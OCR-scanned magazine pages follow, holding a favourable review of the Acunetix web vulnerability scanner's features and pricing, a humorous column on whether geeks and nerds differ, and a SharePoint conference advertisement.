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¢ Target Finder — This functionality lets you scan 
subnets looking for web services by port (e.g. 80, 
443, etc.). This functionality is important especially 
in organizations where there is uncertainty where 
web services are actually running and where 
some malware might have installed web servers 
on users’ machines.This is something that is miss- 
ing in some of the other products out there today. 

¢ Subdomain scanner — this is another feature that 
| did not expect to find in a web security scan- 
ner. The ability to search for subdomains based 
on DNS records automatically is another valu- 
able tool for someone trying to get a handle on 
their environment. 

¢ Compare Results — Conducting repeat scans to 
confirm that issues have been remediated has 
been problematic in other tools. This feature made 
the issues between each test easy to distinguish. 

¢ The Scheduler — Acunetix allows you to schedule 
your scans for a single site or multiple sites. This 
is a great feature in a vulnerability scanner as it 
allows you to test during those late night mainte- 
nance windows without giving up those precious 
hours of sleep or drinking! 

¢ Single Pane Navigation — While this is more of a 
preference, there were many instances where | 
have spent time reviewing issues with application 
teams having to flip through multiple screens. The 
Acunetix issue Summary is managed in one pane 
with all the relevant information provided such as 
issue details, issue Summaries, and recommend- 
ed fixes. The tools mentioned above are all in the 
same frame as well. 


Other Useful Functionalities 

It is impossible to detail all the functionalities of the scan- 
ner in one article but these last few certainly deserve 
a mention. 

One of these is the ability of Acunetix to crawl and scan 
HTML5/JS sites including Angular JS, which is already 
ahead of the pack in version 9.5 and I’m told will be fur- 
ther strengthened in version 10. This is one feature which 
readers should find very useful. 

Another plus is that the information is easy to under- 
stand, the vulnerabilities are categorized allowing the user 
to focus on the most important alerts, and the results in- 
clude information on the vulnerability, remediation advice 
and are augmented with external references. In addition, 
whilst working on the review, the Bash vulnerability was 
discovered, and within 24 hours Acunetix notified of an 
update for a check for Shellshock. 
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Positives 


Easy to use — Acunetix is extremely easy to use right 
after being installed. Additionally, it allowed me to 
configure the scan with some more in depth testing 
options to ensure | covered most of the application 
without sacrificing speed. All key features and func- 
tionality are contained within the application (i.e. is- 
sue retest, scan templates, CVE info, Web Services 
scanning, etc.) and easily found so that the documen- 
tation provided is rarely needed. The additional tools 
(Target finder, subdomain scanners, port scanner, 
etc.) for discovery of your environment are a great ad- 
dition to the product. 

Application Authentication — Authenticating your ap- 
plication is important, as you want to make sure you 
cover your entire application as part of the test. This 
has always been challenging in other products (even 
with a completely separate application to manage au- 
thentication). Acunetix did a good job of handling the 
application authentication through various applica- 
tions without much hassle. 

Pricing — | have worked with other solutions before 
and pricing always seemed to be complex and tiered. 
The Acunetix pricing model is very straightforward 
and very reasonably priced. (https:/www.acunetix. 
com/ordering/). 

Product Transparency — Any time | evaluate any 
product | open my favourite search engine and type 


in ‘$productname bugs’ or ‘$productname request for 
enhancements’ to find some forums on problems that 
current users are having. | was surprised to see that 
Acunetix will make all this information available to all 
people including non-customers. http://acunetixwvs. 
ideascale.com/a/ideatactory.do This is of some reas- 
surance that you're not falling into that slippery sales- 
man approach and that you know what you are buy- 
ing. Check out this page! 

The comparative analyses of similar priced compet- 
itor scanners show that Acunetix scans for and de- 
tects 2 — 3 times the number of vulnerabilities with 
lower false positives and higher confidence. So you 
will scan up to 2 times faster, and you are nonethe- 
less at par or better than the ones that are more high- 
ly priced. This is because of the Acunetix DeepScan 
crawling and scanning technology and also because 
the lab has a much larger collection of scripted or 
choreographed hacking simulations and a wider vari- 
ety of variants that they generate in their War Games 
Lab than most other similarly priced scanners. They 
also provide you with a fully documented SDK for 
scanning script customization. 


Results 


Acunetix focuses on being a good scanner giving 
good technical results and a palette of reports. A 
scan is usually run on a single target. 
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Acunetix Web Vulnerability Scanner 


On the Net 


¢ 14-day Acunetix WVS Download -— http:/www.acunetix.com/vulnerability-scanner/download/ 

¢ 14-day Acunetix OVS Registration — http:/www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scannetr/ 

« Acunetix Website — http:/www.acunetix.com 

¢ Online Scan with Acunetix — https:/www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/ 

« Audit Your Website Security with Acunetix Web Vulnerability Scanner — https:/www.acunetix.com/vulnerability-scanner/ 

« Advanced Pen-Testing Tools — https:/www.acunetix.com/vulnerability-scanner/pen-testing-tools/ 

« Regulatory Compliance Reports for PCI, HIPAA and others — https:/www.acunetix.com/vulnerability-scanner/pci-regulatory-com- 
pliance/ 

¢ AcuMonitor Service — http:/www.acunetix.com/websitesecurity/acumonitor/ 


About Acunetix 

Securing the web applications of today’s businesses is perhaps the most overlooked aspect of securing the enterprise. Web applica- 
tion hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have 
secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnera- 
ble to attack. Web applications — which often have a direct line into the company’s most valuable data assets — are online 24/7, com- 
pletely unprotected by a firewall and therefore easy prey for attackers. 

Acunetix was founded with this threat in mind. It was understood that the only way to combat website hacking was to develop an 
automated tool that could help companies scan their web applications to identify and resolve exploitable vulnerabilities. In July 2005, 
Acunetix Web Vulnerability Scanner was released - a heuristic tool designed to replicate a hacker’s methodology to find dangerous 
vulnerabilities — like SQL injection and cross site scripting — before hackers do. Acunetix WVS brings an extensive feature-set of both 
automated and manual penetration testing tools, enabling security analysts to perform a complete vulnerability assessment, and re- 
pair detected threats, with just the one product. 

The Acunetix development team consists of highly experienced security developers, all with extensive development expe- 
rience in network security scanning software prior to working on Acunetix WVS. The management team is backed by years of 


experience in marketing and selling security software. 
From www.acunetix.com 


¢ Acunetix provides CVE, CVSS, CWE scores either 
in the results or in the reports, as well as OWASP, 
SANS reports. Results can be compared using Acu- 
netix result comparison. Of course risk would need to 
be further assessed on the basis of the target app im- 
portance. If Acunetix is repeatedly used on multiple 
targets then data aggregation solutions need to be 
made available. 

¢ Acunetix results can be consumed by a vulnerabil- 
ity data management system to address more man- 
agement requirements. These solutions would use 
Acunetix XML outputs to integrate with Vulnerability 
Management aggregation tools such as one particu- 
lar Technology Partner Acunetix works with whereby 
the vulnerability information resulting from multiple or- 
chestrated scans and/or scanners would be overlaid 
onto a matrix of applications classified by importance 
to help prioritize remediation tasks. That system 
comes complete with defect tracking and manage- 
ment system integration which then lines up tasks for 
developers in an SDLC environment to look into. Acu- 
netix can point to and support integration with such 
solutions that could be deployed to achieve these 
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goals at a fee if not already available out of the box 
as with particular Technology Partners. 


Conclusion 

As | mentioned earlier, this is the first opportunity | had to 
try Acunetix for any length of time. It has all the features 
and functionality that allows the product to compete with 
the “big boys” in the field but is also reasonably priced. 
Acunetix is a solid product to get your Application Security 
Testing program off the ground. As always ensure that you 
understand your SDLC so that you get the coverage you 
need to test. Acunetix has also recently released an on- 
line version of the scanner for the audit of public internet 
facing Web Servers and Network Interfaces. You need to 
check yourself (so follow the link in “On the Net” frame). 


MICHAEL ORTEGA 
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Is There a Difference Between Geeks 


and Nerds? 


Forget the Internet wars about vi versus Emacs or Windows 
versus Linux. Burr Settles has analysed the language of 2.6 
million tweets to attempt to answer the contentious question 
“Is there a difference between Geeks and Nerds?” Let the 


debate begin. 


watched a number of video commentaries and 
consumed quite a few articles on the subject, my 
personal rating is very probably “Gerd”, a mixture of the 
two. Whereas Nerd is always used as a derogatory term, 
Geek has a trendier, more metro connotation although 
personally | still strongly dislike both terms. As an un- 
ashamed, in-your-face Gerd | would like to bring some 
peace and unity to both camps — we share more than our 
critics would like to admit. 
One word | have continually been described as through- 
out my life is “Deep”. | suspect that term has been applied 


| aving read Burr Settles analysis of the data, 


examine our commonalities in light of the social major- 
ity, rather than bring division — after all, society at large is 
rather wary of us, hence the pigeon-holing, name calling, 
and the tag “Being different”. Fear and insecurity is a very 
strong motivator in the hive mind. 

So let’s get back to Deep. My wife has accused me of 
it, some of colleagues at work have, and very few friends 
who know me well would tend to describe me any oth- 
er way. My immediate retort to this is “Define what you 
mean by deep?” — which in a paradoxically, holistic way 
not only challenges the person making the assertion, but 
also answers the question. Gerds refuse to take things at 


to both Geeks and Nerds in equal measure, so | am go- 
ing to tentatively suggest that we generally have much 
more in common than we have differences, so rather than 
type Geeks and Nerds throughout this article, | will use 
the collective term “Gerd” from now on. Of course, indi- 
viduals will rate differently on this spectrum, but | want to 
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face value, always scratching below the surface. Some 
are content with empirical evidence, some are less sat- 
isfied with classical definitions but the resounding trait 
is to ask questions and search for answers — and quite 
often questions that are taboo, impolite, or just off the 
scale. The point is that we have learned early on in life 
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Is There a Difference Between Geeks and Nerds? 


that most non-gerds tend to live very different lives than 
we do, one of the major traits being that we live in our 
heads. While we really do enjoy social interaction, it has 
got to be based on quality and interchange, rather than 
superficial social convention and a pretend mask of civili- 
sation. | recently shocked a colleague at work who asked 
[in social niceties mode] “How are you Rob?” and got the 
blunt but honest [totally fed up with BS mode] “Rather 
p*ss*d off” reply. | did apologise, but it goes to illustrate 
why Gerds are classed as socially inept. | should have 
just smiled, said “Oh so-so” and not revealed my true 
feelings, but society dictates (at least on this island) that 
you wear your heart on your sleeve at your peril, stiff up- 
per lip and all that. To me, that smacks of duplicity, if you 
dont genuinely want to know where someone is at, don't 
ask them. Sure, talk about the weather, the price of fish 
— anything — but please don’t place me in position where 
| have to effectively lie to you as it makes me feel very 
uncomfortable. On the scale of 1-10 of cardinal sins, our 
social interaction “sleights of hand” may be insignificant, 
but they are cumulative. No wonder we live in a society 
where the culture is so superficial, true education and 
wisdom shunned, and people feel disconnected and iso- 
lated. Most of the time | join my fellow conspirators and 
“play the game” but it does nothing but reinforce my be- 
lief that the majority of people (outside of the Gerd com- 
munity) walk to the beat of a different drum. 

| believe that all Gerds feel that their value systems have 
been betrayed at sometime in their life. Maybe it was to- 
tally believing in Santa Claus and discovering you were — 
whilst not deliberately — effectively lied to (my first person- 
al recollection of worldview shock) or maybe it was just 
being clever and different in an amorphous peer group. 
With large ears, thick spectacles, and a comprehensive 
vocabulary at school | was obvious Gerd material. The fa- 
vourite insult thrown in my direction was “You swallowed 
a dictionary?” (My 14 year old daughter also accuses me 
of this, but having chatted to her about it, there is a se- 
cret pride there in her old dad, so | don’t mind too much). 
This fracture in perception, the understanding that the 
world is a very different place from what we understand to 
be internally, is what makes Gerds, Gerds. We withdraw 


from the superficiality of human interaction with its mov- 
able values and eccentricities into a more clearly defined 
space, where the rules are more easily learned and rigor- 
ously enforced. Take computing for instance, no matter 
how much you yell at a computer, or how expensive your 
suit, or how important the deadline, or how much you love 
it (or lust after it for that matter) — it will not work unless 
you play by a strict set of immutable rules. Try applying 
that methodology in the workplace. People get promot- 
ed on the basis of gender, looks or connections, they are 
fired for speaking the truth. The power of personality rules 
and corporate culture then becomes an amalgam of those 
who most effectively play this very subtle game. In other 
words success regardless of talent, experience, logic or 
knowledge. No wonder Gerds retire to a quiet corner with 
a thick book or a green screen terminal and a tape drive. 

Society has this pathological addiction to classifying 
and judging people on such superficial metrics as looks, 
fashion, intelligence, money, education, race, national- 
ity or gender. Like everyone else on this planet, | am an 
unique individual of value. Treat me as such and do not 
fold, spindle or mutilate. Hence my pungent distaste at be- 
ing labelled a Gerd or indeed “Deep”. Please feel free to 
categorise me as such, provided | can categorise you as 
a living testimony to a grey mush of social conformity. Un- 
less of course you are a Geek or a Nerd, in which case | 
will take it as a compliment from a peer. 

lronically, my employer is sending everyone on a diver- 
sity and equality training course, and | have prepared well 
for this. My Unix beard is long but neat and my hair is just 
long enough to form a decent ponytail. Maybe | should 
just hand this article in instead. 


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early 
teens. A keen advocate of open systems since the mid-eighties, he has 
worked in many corporate sectors including finance, automotive, air- 
lines, government and media in a variety of roles from technical sup- 
port, system administrator, developer, systems integrator and IT man- 
ager. He has moved on from CP/M and nixie tubes but keeps a solder- 
ing iron handy just in case. 
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The BIGGEST, the BEST, the TEXASAIST 
SharePoint Conference ever} 


SharePoint is at the Crossroads — M4 SPTechCon 
Which Way Will You Go? 


SharePoint in the cloud or on premises? Or both? Come to SPTechCon Austin 

2015 and learn about the differences between Office 365, cloud-hosted Fanon 3- l L, 201 . 
SharePoint, on-premises SharePoint, and hybrid solutions and build your Renaissance hat Hotel 
company’s SharePoint Roadmap! 

For developers, the future means a new app model and new app paradigms. S0+ Classes 

For IT pros and SharePoint admins, it’s trying to retain control over an installa- 

tion that’s now in the cloud. For information workers and their managers, it’s AO + Microsoft FX ert 
about learning how to work ‘social.’ But it’s not for everyone. p 
Where do you need to be? Speakers 

The answer is simple: SPTechCon Austin. With a collection of the top _Ci 
SharePoint MVPs and expert speakers, more than 80 classes and tutorials Get Your Texas Sized 
to choose from and panels focused on the changes in SharePoint, Registration Discount— 


SPTechCon will teach you how to master the present and plan for the future. 


Register NOW! 


A Event 


